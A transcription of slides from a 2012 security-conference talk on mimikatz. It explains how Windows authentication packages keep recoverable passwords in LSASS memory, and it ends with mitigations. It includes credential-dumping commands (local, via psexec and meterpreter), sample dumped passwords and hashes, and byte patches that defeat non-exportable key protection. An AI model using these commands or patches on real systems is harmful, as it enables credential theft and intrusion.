especially if you have written down the corresponding slide number
Blog, Source Code & Contact
blog      http://blog.gentilkiwi.com
mimikatz  http://blog.gentilkiwi.com/mimikatz
source    https://code.google.com/p/mimikatz
email     benjamin@gentilkiwi.com
mimikatz :: sekurlsa :: tspkg :: what is it?
Microsoft introduced an SSO capability for Terminal Server with NT 6 to improve the RemoteApps and RemoteDesktop user experience
– http://technet.microsoft.com/library/cc772108.aspx
Relies on CredSSP with Credentials Delegation (= Account delegation)
– Specs: http://download.microsoft.com/download/9/5/e/95ef66af-9026-4bb0-a41d-a4f81802d92c/%5Bms-cssp%5D.pdf
First impression: it seems cool
– User does not have to type its password
– Password is not in the RDP file
– Password is not in user secrets
mimikatz :: sekurlsa :: tspkg :: questions
The KB says that for it to work, we must enable « Default credentials » delegation
– “Default credentials: The credentials obtained when the user first logs on to Windows” - https://msdn.microsoft.com/library/bb204773.aspx
  • What? Our User/Domain/Password? | Hash? | Ticket? It seems…
– In all cases, the system seems to be vulnerable to pass-the-…
In what form? Our specs: [MS-CSSP]
– 2.2.1.2.1 TSPasswordCreds
  • The TSPasswordCreds structure contains the user's password credentials that are delegated to the server (or PIN).
    TSPasswordCreds ::= SEQUENCE {
        domainName  [0] OCTET STRING,
        userName    [1] OCTET STRING,
        password    [2] OCTET STRING
    }
– Challenge response for authentication?
  • Server: YES (TLS, Kerberos)
  • Client: NO, the password is sent to the server…
So the password resides somewhere in memory!
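As an added illustration (not part of the slides and not mimikatz code), the following Python encodes and decodes a TSPasswordCreds structure as DER, so the point above can be checked on bytes: the password is carried as a plain OCTET STRING, not as a hash or challenge response. It assumes, as [MS-CSSP] specifies, explicit context tags and UTF-16LE strings; the sample credentials reuse the demo values shown later in the deck and are constructed, not captured.

```python
# Added example: DER encode/decode of the CredSSP TSPasswordCreds structure
# quoted on the slide ([MS-CSSP] 2.2.1.2.1). Standard library only.
#
#   TSPasswordCreds ::= SEQUENCE {
#       domainName [0] OCTET STRING,
#       userName   [1] OCTET STRING,
#       password   [2] OCTET STRING
#   }
#
# Assumptions (stated in the lead-in): [MS-CSSP] uses EXPLICIT context tags, so
# each field is a [n] wrapper around an OCTET STRING, and the string content is
# UTF-16LE. What matters for the slide's argument: the server receives the
# password itself, so the client must hold it in clear to build this structure.
from typing import Dict, Tuple

TAG_SEQUENCE = 0x30
TAG_OCTET_STRING = 0x04
FIELDS = ("domainName", "userName", "password")


def _der_length(n: int) -> bytes:
    """DER definite length: short form below 128, long form (0x8N + N bytes) otherwise."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def _tlv(tag: int, content: bytes) -> bytes:
    return bytes([tag]) + _der_length(len(content)) + content


def _context_tag(index: int) -> int:
    """Context-specific constructed tag [index]: 0xA0, 0xA1, 0xA2, ..."""
    return 0xA0 | index


def encode_ts_password_creds(domain: str, user: str, password: str) -> bytes:
    """Build the DER TSPasswordCreds SEQUENCE that a client sends inside the TLS channel."""
    fields = []
    for index, value in enumerate((domain, user, password)):
        octets = _tlv(TAG_OCTET_STRING, value.encode("utf-16-le"))
        fields.append(_tlv(_context_tag(index), octets))
    return _tlv(TAG_SEQUENCE, b"".join(fields))


def _read_tlv(buf: bytes, pos: int) -> Tuple[int, bytes, int]:
    """Parse one TLV at pos; return (tag, content, next_pos). Rejects truncated input."""
    if pos + 2 > len(buf):
        raise ValueError("truncated TLV header")
    tag, first = buf[pos], buf[pos + 1]
    pos += 2
    if first < 0x80:
        length = first
    else:
        count = first & 0x7F
        if count == 0 or pos + count > len(buf):
            raise ValueError("bad long-form length")
        length = int.from_bytes(buf[pos:pos + count], "big")
        pos += count
    if pos + length > len(buf):
        raise ValueError("TLV content runs past end of buffer")
    return tag, buf[pos:pos + length], pos + length


def decode_ts_password_creds(blob: bytes) -> Dict[str, str]:
    """Parse a DER TSPasswordCreds back into its three fields (what the server sees)."""
    tag, seq, end = _read_tlv(blob, 0)
    if tag != TAG_SEQUENCE or end != len(blob):
        raise ValueError("expected a single SEQUENCE")
    result: Dict[str, str] = {}
    pos = 0
    for index, name in enumerate(FIELDS):
        ctag, wrapped, pos = _read_tlv(seq, pos)
        if ctag != _context_tag(index):
            raise ValueError(f"expected [{index}] for {name}, got 0x{ctag:02x}")
        otag, octets, inner_end = _read_tlv(wrapped, 0)
        if otag != TAG_OCTET_STRING or inner_end != len(wrapped):
            raise ValueError(f"{name}: expected exactly one OCTET STRING")
        result[name] = octets.decode("utf-16-le")
    if pos != len(seq):
        raise ValueError("trailing data after the password field")
    return result


# Constructed sample (the demo values from the deck, not a captured exchange).
SAMPLE = encode_ts_password_creds("vm-w8-rp-x", "Gentil Kiwi", "waza1234")
```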
mimikatz :: sekurlsa :: tspkg :: symbols & theory
Let’s explore some symbols
– sounds cool… (thanks Microsoft)
Let’s imagine a scenario:
– Enumerate all sessions to obtain
  • Username
  • Domain
  • LUID
– Call tspkg!TSCredTableLocateDefaultCreds (relies on RtlLookupElementGenericTableAvl) with the LUID to obtain
  • TS_CREDENTIAL
– Call tspkg!TSObtainClearCreds (relies on LsaUnprotectMemory) with the TS_CREDENTIAL data (TS_PRIMARY_CREDENTIAL) for
  • a TS_PRIMARY_CREDENTIAL with clear text credentials…

kd> x tspkg!*clear*
75016d1c          tspkg!TSObtainClearCreds = <no type information>
kd> x tspkg!*password*
75011b68          tspkg!TSDuplicatePassword = <no type information>
75011cd4          tspkg!TSHidePassword = <no type information>
750195ee          tspkg!TSRevealPassword = <no type information>
75012fbd          tspkg!TSUpdateCredentialsPassword = <no type information>
kd> x tspkg!*locate*
7501158b          tspkg!TSCredTableLocateDefaultCreds = <no type information>
mimikatz :: sekurlsa :: tspkg :: workflow
Workflow diagram: LsaEnumerateLogonSessions → for each LUID → RtlLookupElementGenericTableAvl on tspkg!TSGlobalCredTable → KIWI_TS_CREDENTIAL → KIWI_TS_PRIMARY_CREDENTIAL → LsaUnprotectMemory → password in clear

typedef struct _KIWI_TS_PRIMARY_CREDENTIAL {
    PVOID unk0;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Password;
} KIWI_TS_PRIMARY_CREDENTIAL, *PKIWI_TS_PRIMARY_CREDENTIAL;

typedef struct _KIWI_TS_CREDENTIAL {
#ifdef _M_X64
    BYTE unk0[108];
#elif defined _M_IX86
    BYTE unk0[64];
#endif
    LUID LocallyUniqueIdentifier;
    PVOID unk1;
    PVOID unk2;
    PKIWI_TS_PRIMARY_CREDENTIAL pTsPrimary;
} KIWI_TS_CREDENTIAL, *PKIWI_TS_CREDENTIAL;
mimikatz :: sekurlsa :: tspkg :: demo time
sekurlsa::tspkg
mimikatz :: sekurlsa :: wdigest
because clear text password over http/https is not cool
mimikatz :: sekurlsa :: wdigest :: what is it?
“Digest access authentication is one of the agreed-upon methods a web server can use to negotiate credentials with a user's web browser. It applies a hash function to a password before sending it over the network. […]” Wikipedia: http://en.wikipedia.org/wiki/Digest_access_authentication
“Common Digest Authentication Scenarios:
– Authenticated client access to a Web site
– Authenticated client access using SASL
– Authenticated client access with integrity protection to a directory service using LDAP” Microsoft: http://technet.microsoft.com/library/cc778868.aspx
Again, it seems cool:
– No password over the network, just hashes
– No reversible password in Active Directory, hashes for each realm
  • Only with Advanced Digest authentication
mimikatz :: sekurlsa :: wdigest :: what is it?
We speak about hashes, but which hashes? H = MD5(HA1:nonce:[…]:HA2)
  • HA1 = MD5(username:realm:password)
  • HA2 = MD5(method:digestURI:[…])
Even after logon, HA1 may change… the realm comes from the server side and cannot be determined before the Windows logon
The WDigest provider must have the elements to compute responses for different servers:
– Username
– Realm (from the server)
– Password
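The following added Python example (not from the slides and not mimikatz code) carries the RFC 2617 computation through: HA1 and HA2 as defined above, the response in both the qop form and the older RFC 2069 form, and a server that keeps only per-realm HA1 values. It shows that a server can verify from HA1 alone, while a client needs the clear password because HA1 changes with the realm the server announces; the user, password and realm names are constructed.

```python
# Added example (not from the slides, not mimikatz code): the RFC 2617 Digest
# computation the wdigest slides describe. HA1 depends on the realm chosen by
# the server, so a client holding only one precomputed HA1 cannot answer an
# arbitrary server, while a client holding the clear password can.
import hashlib
import hmac
from typing import Dict, Optional


def _md5(text: str) -> str:
    return hashlib.md5(text.encode("utf-8")).hexdigest()


def ha1(username: str, realm: str, password: str) -> str:
    """HA1 = MD5(username:realm:password): the only term that needs the password."""
    return _md5(f"{username}:{realm}:{password}")


def ha2(method: str, digest_uri: str) -> str:
    """HA2 = MD5(method:digestURI) for qop=auth or for the legacy no-qop form."""
    return _md5(f"{method}:{digest_uri}")


def response_from_ha1(h1: str, nonce: str, h2: str,
                      nc: str = "", cnonce: str = "", qop: str = "") -> str:
    """Request-digest computed from HA1 alone (all a server needs).
    With qop (RFC 2617):      MD5(HA1:nonce:nc:cnonce:qop:HA2)
    Without qop (RFC 2069):   MD5(HA1:nonce:HA2)"""
    if qop:
        return _md5(f"{h1}:{nonce}:{nc}:{cnonce}:{qop}:{h2}")
    return _md5(f"{h1}:{nonce}:{h2}")


def client_response(username: str, realm: str, password: str, method: str,
                    uri: str, nonce: str, nc: str = "", cnonce: str = "",
                    qop: str = "") -> str:
    """What the client computes once the server has announced realm and nonce.
    The realm is unknown before that challenge, so the password is needed here."""
    return response_from_ha1(ha1(username, realm, password), nonce,
                             ha2(method, uri), nc, cnonce, qop)


class DigestServer:
    """Server storing only per-realm HA1 values (the 'Advanced Digest' model:
    no reversible password at rest). It never needs the password to verify."""

    def __init__(self, realm: str) -> None:
        self.realm = realm
        self._ha1_by_user: Dict[str, str] = {}

    def provision(self, username: str, password: str) -> None:
        # Keep HA1 only; the clear password is dropped after this call.
        self._ha1_by_user[username] = ha1(username, self.realm, password)

    def verify(self, username: str, method: str, uri: str, nonce: str,
               nc: str, cnonce: str, qop: str, response: str) -> bool:
        """Recompute the expected response from the stored HA1; compare in constant time."""
        h1: Optional[str] = self._ha1_by_user.get(username)
        if h1 is None:
            return False
        expected = response_from_ha1(h1, nonce, ha2(method, uri), nc, cnonce, qop)
        return hmac.compare_digest(expected, response)


def realm_dependence_demo(username: str = "Gentil Kiwi",
                          password: str = "waza1234") -> Dict[str, object]:
    """One user and password against two constructed realms: HA1 differs, so an
    HA1 stored for the first realm is useless against the second. Only the clear
    password (or one HA1 per realm, known in advance) lets the client answer both."""
    realm_a, realm_b = "intranet.example", "mail.example"
    h_a = ha1(username, realm_a, password)
    h_b = ha1(username, realm_b, password)
    return {"realm_a": realm_a, "realm_b": realm_b,
            "ha1_a": h_a, "ha1_b": h_b, "same_ha1": h_a == h_b}
```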
mimikatz :: sekurlsa :: wdigest :: theory
This time we know:
– that WDigest keeps the password in memory « by protocol » for the HA1 digest
– that LSASS loves to unprotect passwords with LsaUnprotectMemory (so it protects them with LsaProtectMemory)
LsaUnprotectMemory
– At offset 0xb4 of LSA_SECPKG_FUNCTION_TABLE
– Let’s search for it in WDigest
– Hypothesis seems verified
LsaProtectMemory
– At offset 0xb0 of LSA_SECPKG_FUNCTION_TABLE
– Let’s search for it in WDigest
– SpAcceptCredentials takes the clear password in its arguments
  • Protects it with LsaProtectMemory
  • Updates or inserts data in the double linked list wdigest!l_LogSessList

.text:7409D151  _DigestCalcHA1@8         call dword ptr [eax+0B4h]
.text:74096C69  _SpAcceptCredentials@16  call dword ptr [eax+0B0h]
mimikatz :: sekurlsa :: wdigest :: workflow
Workflow diagram: LsaEnumerateLogonSessions → for each LUID → search the linked list wdigest!l_LogSessList for the LUID → KIWI_WDIGEST_LIST_ENTRY → LsaUnprotectMemory → password in clear

typedef struct _KIWI_WDIGEST_LIST_ENTRY {
    struct _KIWI_WDIGEST_LIST_ENTRY *Flink;
    struct _KIWI_WDIGEST_LIST_ENTRY *Blink;
    DWORD UsageCount;
    struct _KIWI_WDIGEST_LIST_ENTRY *This;
    LUID LocallyUniqueIdentifier;
    […]
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;
    […]
} KIWI_WDIGEST_LIST_ENTRY, *PKIWI_WDIGEST_LIST_ENTRY;
mimikatz :: sekurlsa :: wdigest :: demo time
sekurlsa::wdigest

mimikatz :: sekurlsa :: livessp
because Microsoft was too good in closed networks
mimikatz :: sekurlsa :: livessp :: how?
Actually, I’ve only used a logical (empirical) approach to search for passwords…
– Protocol reading
– Symbols searching
~ Boring ~ … let’s be more brutal this time: set a WinDBG trap

0: kd> !process 0 0 lsass.exe
PROCESS 83569040  SessionId: 0  Cid: 0224    Peb: 7f43f000  ParentCid: 01b4
    DirBase: 5df58100  ObjectTable: 80ce4740  HandleCount: <Data Not Accessible>
    Image: lsass.exe
0: kd> .process /i 83569040
You need to continue execution (press 'g' <enter>) for the context
to be switched. When the debugger breaks in again, you will be in
the new process context.
0: kd> g
Break instruction exception - code 80000003 (first chance)
nt!RtlpBreakWithStatusInstruction:
814b39d0 cc              int     3
0: kd> .reload /user
Loading User Symbols
0: kd> bp /p $proc lsasrv!LsaProtectMemory "kc 5; g"
0: kd> g
mimikatz :: sekurlsa :: livessp :: how?
Let’s login with a Live account on Windows 8
After credentials protection, LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest)

Stack traces caught by the LsaProtectMemory trap:
lsasrv!LsaProtectMemory
livessp!LiveMakeSupplementalCred
livessp!LiveMakeSecPkgCredentials
livessp!LsaApLogonUserEx2
livessp!SpiLogonUserEx2            ← Our LiveSSP provider

lsasrv!LsaProtectMemory
msv1_0!NlpAddPrimaryCredential
msv1_0!SspAcceptCredentials
msv1_0!SpAcceptCredentials

lsasrv!LsaProtectMemory
tspkg!TSHidePassword
tspkg!SpAcceptCredentials

1: kd> uf /c livessp!LsaApLogonUserEx2
livessp!LsaApLogonUserEx2 (74781536)
[...]
  livessp!LsaApLogonUserEx2+0x560 (74781a96):
    call to livessp!LiveCreateLogonSession (74784867)

Yeah, Pass the Hash capability with Live accounts too…
A Live user can logon through RDP via SSO
mimikatz :: sekurlsa :: livessp :: workflow
Workflow diagram: LsaEnumerateLogonSessions → for each LUID → search the linked list livessp!LiveGlobalLogonSessionList for the LUID → KIWI_LIVESSP_LIST_ENTRY → KIWI_LIVESSP_PRIMARY_CREDENTIAL → LsaUnprotectMemory → password in clear

typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL {
    DWORD isSupp;
    DWORD unk0;
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;
} KIWI_LIVESSP_PRIMARY_CREDENTIAL, *PKIWI_LIVESSP_PRIMARY_CREDENTIAL;

typedef struct _KIWI_LIVESSP_LIST_ENTRY {
    struct _KIWI_LIVESSP_LIST_ENTRY *Flink;
    struct _KIWI_LIVESSP_LIST_ENTRY *Blink;
    PVOID unk0;
    PVOID unk1;
    PVOID unk2;
    PVOID unk3;
    DWORD unk4;
    DWORD unk5;
    PVOID unk6;
    LUID LocallyUniqueIdentifier;
    LSA_UNICODE_STRING UserName;
    PVOID unk7;
    PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds;
} KIWI_LIVESSP_LIST_ENTRY, *PKIWI_LIVESSP_LIST_ENTRY;
mimikatz :: sekurlsa
Even if we already have tools for normal accounts, aren’t you curious to test one with this trap?
Me: yes!
mimikatz :: sekurlsa :: kerberos
Let’s login with a normal account
After credentials protection, KerbCreateLogonSession calls:
– NT6: KerbInsertOrLocateLogonSession to insert data in KerbGlobalLogonSessionTable
– NT5: KerbInsertLogonSession to insert data in KerbLogonSessionList

Stack traces caught by the LsaProtectMemory trap:
lsasrv!LsaProtectMemory
kerberos!KerbHideKey
kerberos!KerbCreatePrimaryCredentials
kerberos!KerbCreateLogonSession
kerberos!SpAcceptCredentials       ← Kerberos ticket part? Maybe ;)

lsasrv!LsaProtectMemory
kerberos!KerbHidePassword
kerberos!KerbCreateLogonSession
kerberos!SpAcceptCredentials       ← Kerberos part for the password

lsasrv!LsaProtectMemory
msv1_0!NlpAddPrimaryCredential
msv1_0!SspAcceptCredentials
msv1_0!SpAcceptCredentials

lsasrv!LsaProtectMemory
wdigest!SpAcceptCredentials

lsasrv!LsaProtectMemory
tspkg!TSHidePassword
tspkg!SpAcceptCredentials
mimikatz :: sekurlsa :: kerberos (nt6) :: workflow
Workflow diagram: LsaEnumerateLogonSessions → for each LUID → RtlLookupElementGenericTableAvl on kerberos!KerbGlobalLogonSessionTable → KIWI_KERBEROS_PRIMARY_CREDENTIAL → LsaUnprotectMemory → password in clear

typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL {
    DWORD unk0;
    PVOID unk1;
    PVOID unk2;
    PVOID unk3;
#ifdef _M_X64
    BYTE unk4[32];
#elif defined _M_IX86
    BYTE unk4[20];
#endif
    LUID LocallyUniqueIdentifier;
#ifdef _M_X64
    BYTE unk5[44];
#elif defined _M_IX86
    BYTE unk5[36];
#endif
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;
} KIWI_KERBEROS_PRIMARY_CREDENTIAL, *PKIWI_KERBEROS_PRIMARY_CREDENTIAL;
mimikatz sekurlsa kerberos (nt5)workflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 29
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_KERBEROS_LOGON_SESSION struct _KIWI_KERBEROS_LOGON_SESSION Flinkstruct _KIWI_KERBEROS_LOGON_SESSION Blink DWORD UsageCountPVOID unk0PVOID unk1PVOID unk2DWORD unk3DWORD unk4PVOID unk5PVOID unk6PVOID unk7LUID LocallyUniqueIdentifier
ifdef _M_IX86DWORD unk8
endifDWORD unk9DWORD unk10PVOID unk11DWORD unk12DWORD unk13PVOID unk14PVOID unk15PVOID unk16[hellip]LSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password
KIWI_KERBEROS_LOGON_SESSION PKIWI_KERBEROS_LOGON_SESSION
kerberosKerbLogonSessionList
search linked list for LUID
KIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsademo time
Final sekurlsa demo sekurlsalogonPasswords full
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 30
mimikatz sekurlsa kerberosldquohu rdquo
Ok It workshellip
But why
Not at all logon on NT5 (can need an unlock)
From my understanding of Microsoft explanations
ndash no need of passwords for the Kerberos protocolhellip
ndash all is based on the hash (not very sexy too)
Microsoftrsquos implementation of Kerberos is full of logicalhellip
ndash For password auth
bull password hash for shared secret but keeping password in memory
ndash For full smartcard auth
bull No password on client
bull No hash on client
ndash NTLM hash on clienthellip
ndash KDC sent it back as a gift
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 31
mimikatz sekurlsa
All passwords in memory are encrypted but in a reversible way to be used
We used LsaUnprotecMemory in the LSASS context to decrypt them
ndash This function rely on LsaEncryptMemory from lsasrvdll
For that we previously inject a DLL (sekurlsadll) in the LSASS process to take benefits of its keys when we called it
Can it be fun to decrypt outside the process ndash Yes it ishellip no more injection just reading memory of LSASS processhellip
mimikatz can use lsasrvdll too and ldquoimportsrdquo LSASS initialized keys ndash When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS we have
the same comportments than when we are in LSASS
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 32
LsaUnprotectMemory
mimikatz sekurlsaLsaEncryptMemory NT5
Depending on the size of the secret LsaEncryptMemory use
ndash RC4
ndash DESx
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 33
g_pRandomKey
g_cbRandomKey
BYTE[g_cbRandomKey]
DWORD 256
BYTE[g_cbRandomKey]
g_pDESXKeyBYTE[144]
BYTE[144]
g_Feedback BYTE[8]
lsass
lsasrv
lsass
lsasrv
mimikatz
lsasrv
copyhellip
mimikatz sekurlsaLsaEncryptMemory NT6
Depending on the size of the secret LsaEncryptMemory use
ndash 3DES
ndash AES
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 34
InitializationVector BYTE[16]
lsass
lsasrv
lsass
lsasrv
mimikatz
copyhellip
h3DesKey
typedef struct _KIWI_BCRYPT_KEY_DATA DWORD sizeDWORD tagDWORD typeDWORD unk0DWORD unk1DWORD unk2DWORD unk3PVOID unk4BYTE data etc
KIWI_BCRYPT_KEY_DATA PKIWI_BCRYPT_KEY_DATA
hAesKey
lsasrv typedef struct _KIWI_BCRYPT_KEY
DWORD sizeDWORD typePVOID unk0PKIWI_BCRYPT_KEY_DATA clePVOID unk1
KIWI_BCRYPT_KEY PKIWI_BCRYPT_KEY
mimikatz :: sekurlsa :: memo
Security Packages

    Package          Symbols                                                    Type
    tspkg            tspkg!TSGlobalCredTable                                    RTL_AVL_TABLE
    wdigest          wdigest!l_LogSessList                                      LIST_ENTRY
    livessp          livessp!LiveGlobalLogonSessionList                         LIST_ENTRY
    kerberos (nt5)   kerberos!KerbLogonSessionList                              LIST_ENTRY
    kerberos (nt6)   kerberos!KerbGlobalLogonSessionTable                       RTL_AVL_TABLE
    msv1_0           lsasrv!LogonSessionList / lsasrv!LogonSessionListCount     LIST_ENTRY / ULONG

Protection Keys

    Key     NT 5 symbols
    RC4     lsasrv!g_cbRandomKey / lsasrv!g_pRandomKey
    DESX    lsasrv!g_pDESXKey / lsasrv!g_Feedback

    Key     NT 6 symbols
    (IV)    lsasrv!InitializationVector
    3DES    lsasrv!h3DesKey
    AES     lsasrv!hAesKey
mimikatz :: sekurlsa :: memo
Some commands:
    mimikatz "privilege::debug" "sekurlsa::logonPasswords full" exit
    psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe "sekurlsa::logonPasswords full" exit
    meterpreter > execute -H -c -i -m -f /pentest/passwords/mimikatz/mimikatz_x86.exe

    mimikatz 1.0 x64 (RC) /* Traitement du Kiwi (Aug 2 2012 01:32:28) */ // http://blog.gentilkiwi.com/mimikatz

    mimikatz # privilege::debug
    Request to ENABLE the SeDebugPrivilege privilege: OK

    mimikatz # sekurlsa::logonPasswords full

    Authentication Id      : 0;234870
    Authentication package : NTLM
    Primary user           : Gentil Kiwi
    Authentication domain  : vm-w8-rp-x
        msv1_0 :   User : Gentil Kiwi   Domain : vm-w8-rp-x   LM hash : d0e9aee149655a6075e4540af1f22d3b   NTLM hash : cc36cf7a8514893efccd332446158b1a
        kerberos : User : Gentil Kiwi   Domain : vm-w8-rp-x   Password : waza1234
        wdigest :  User : Gentil Kiwi   Domain : vm-w8-rp-x   Password : waza1234
        tspkg :    User : Gentil Kiwi   Domain : vm-w8-rp-x   Password : waza1234
        livessp :  n.t. (LUID KO)
mimikatz :: sekurlsa :: what can we do?
Basics:
- No physical access to the computer (first step to pass the hash, then pass the pass)
- No admin rights / system rights / debug privileges (...)
- Disable local admin accounts
- Strong passwords (haha, it was a joke, so useless!)
- For privileged accounts: network logon instead of interactive (when possible)
- Audit: pass the hash keeps traces and can lock accounts
- No admin rights / system rights / debug privileges, even for VIPs
- Use a separate network (or forest) for privileged tasks
More in depth:
- Force strong authentication (SmartCard & Token) $ €
- Short validity for Kerberos tickets
- No delegation
- Disable NTLM (available with NT6)
- No exotic:
  • biometrics (it keeps the password somewhere and pushes it to Windows)
  • single sign on
- Stop shared secrets for authentication, push Public/Private stuff (like keys ;))
- Take the opportunities to stop retro-compatibility
- Disable faulty providers
  • Is it supported by Microsoft?
  • Even if you can disable LiveSSP, TsPkg and WDigest, will you disable Kerberos and msv1_0?
mimikatz :: crypto :: what is it?
A little module that I wrote to:
- play with Windows Cryptographic API, CNG and RSA keys
- automate the export of certificates/keys
  • Even those which are "not" exportable
What the crypto module can do:
- List
  • Providers
  • Stores
  • Certificates
  • Keys
- Export
  • Certificates
    - public, in DER format
    - with private keys, in PFX format
  • Private keys in PVK format - it's cool, OpenSSL can deal with it too
- Patch
  • CryptoAPI, in mimikatz context
  • CNG, in LSASS context (again!)
(module: mod_mimikatz_crypto)
mimikatz :: crypto :: how is it protected?
Private keys are DPAPI protected
- You cannot reuse private key files on another computer
  • At least not without the master keys and/or the users' passwords
Computer/User can load their own keys because they have enough secrets to do it (ex: session opened)
- Yes, a computer/server opens a "session"
Export/Usage can be limited by:
- Password
- Popup
- Export/Archive flag not present
(Password and popup: a constraint for most users, and unavailable for computer keys)

    certutil -importpfx mycert.p12 NoExport
    certutil -csp "Microsoft Enhanced Cryptographic Provider v1.0" -importpfx mycert.p12 NoExport
mimikatz :: crypto :: capi :: how it works?
"Microsoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules. CSPs perform all cryptographic operations and manage private keys. CSPs can be implemented in software as well as in hardware." - http://technet.microsoft.com/library/cc962093.aspx
Processes (mimikatz, IIS, Active Directory, Internet Explorer, your apps here...) load some DLLs to deal with the different cryptographic stuff: CSP (keys), smartcard readers, ...
- cryptdll.dll, rsaenh.dll, ...
Processes deal with cryptographic keys through this API...
mimikatz :: crypto :: capi :: how is it exported?
[Figure: flowchart. The process, through CryptoAPI and the RSA CSP, loads the private key (DPAPI decode) and asks to export the key. Exportable? yes -> exported key; no -> NTE_BAD_KEY_STATE. The whole check runs inside the calling process's own address space (labelled "PLAYSKOOL" on the slide).]
mimikatz :: crypto :: patch :: capi :: because I own my process
When we want to export a certificate with its private key (or only the key), it goes to rsaenh!CPExportKey
This function does all the work to prepare the export, and checks if the key is exportable

    mimikatz # crypto::exportCertificates
    Location : 'CERT_SYSTEM_STORE_CURRENT_USER'\My
     - Benjamin Delpy
        Key container  : 470ADFBA-8718-4014-B05E-B30776B75A03
        Provider       : Microsoft Enhanced Cryptographic Provider v1.0
        Type           : AT_KEYEXCHANGE
        Exportability  : NO
        Key size       : 2048
        Private export to 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.pfx' : KO (0x8009000b) Key not valid for use in specified state.
        Public export to 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.der' : OK

The same key seen by certutil:

    ================ Certificate 0 ================
    Serial Number: 112169417a1c3ef46a301f99385f50680fa0
    Issuer: CN=GlobalSign CodeSigning CA - G2, O=GlobalSign nv-sa, C=BE
    Subject: CN=Benjamin Delpy, C=FR
    Non-root Certificate
    Cert Hash(sha1): ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
      Key Container = 470ADFBA-8718-4014-B05E-B30776B75A03
      Provider = Microsoft Enhanced Cryptographic Provider v1.0
    Private key is NOT exportable
    Encryption test passed
    CertUtil: -exportPFX command FAILED: 0x8009000b (-2146893813)
    CertUtil: Key not valid for use in specified state.
mimikatz :: crypto :: patch :: capi :: because I own my process
So what? A module in my own process tells me I can't do something? CryptoAPI is in my memory space, let's patch it!
I wrote "4" bytes in my memory space (the two opcode bytes at each of the two sites: 0F 85 becomes 90 E9, the rel32 displacement is left untouched):

    .text:0AC0B7CB 0F 85 33 C7 FF FF    jnz  continue_key_export_or_archive
    .text:0AC0B7CB 90                   nop
    .text:0AC0B7CC E9 33 C7 FF FF       jmp  continue_key_export_or_archive

    .text:0AC1F749 0F 85 B6 3B FF FF    jnz  continue_key_export_or_archive_prepare
    .text:0AC1F749 90                   nop
    .text:0AC1F74A E9 B6 3B FF FF       jmp  continue_key_export_or_archive_prepare
mimikat:: crypto :: patch :: capi :: demo time
Import, export, import as not exportable..., export!
mimikatz :: crypto :: patch :: capi :: limitations
Because:
- I'm lazy
- I've seen, in the majority of cases, RSA keys for real-life use
  • Elliptic Curve, a little...
mimikatz crypto::patchcapi only deals with:
- Microsoft Base Cryptographic Provider v1.0
- Microsoft Enhanced Cryptographic Provider v1.0
- Microsoft Enhanced RSA and AES Cryptographic Provider
- Microsoft RSA SChannel Cryptographic Provider
- Microsoft Strong Cryptographic Provider
...all based on rsaenh.dll
mimikatz :: crypto :: cng :: how it works?
"Cryptography API: Next Generation (CNG) is the long-term replacement for the CryptoAPI. CNG is designed to be extensible at many levels and cryptography agnostic in behavior." - http://msdn.microsoft.com/library/windows/desktop/aa376210.aspx
"To comply with common criteria (CC) requirements, the long-lived keys must be isolated so that they are never present in the application process. CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default."
This time, key operations are not made in the "user" process context
Processes use RPC to call "Key isolation service" (keyiso) functions
It seems more secure than CryptoAPI...
- It is, but it's not perfect...
mimikatz :: crypto :: cng :: how is it exported?
[Figure: flowchart. The process calls CNG, which forwards the request over RPC to the KeyIso service hosted in the LSASS process; there the private key is loaded (DPAPI decode) and the export request is checked. Exportable? yes -> exported key; no -> NTE_NOT_SUPPORTED. On NT6, LSASS is a SYSTEM protected process (mandatory label ML_SYSTEM, SYSTEM_MANDATORY_LABEL_NO_WRITE_UP / SYSTEM_MANDATORY_LABEL_NO_READ_UP), so the check no longer runs in the caller's address space; the client side is still labelled "PLAYSKOOL".]
mimikatz :: crypto :: patch :: cng :: because sometimes I own LSASS
When we want to export a certificate with its private key (or only the key), the RPC calls lead to ncrypt!SPCryptExportKey, in lsass (keyiso)
This function does all the work to prepare the export, and checks if the key is exportable

    mimikatz # crypto::exportKeys
    [user] CNG keys:
     - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
        Exportability  : NO
        Key size       : 2048
        Private export to 'cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318.pvk' : KO
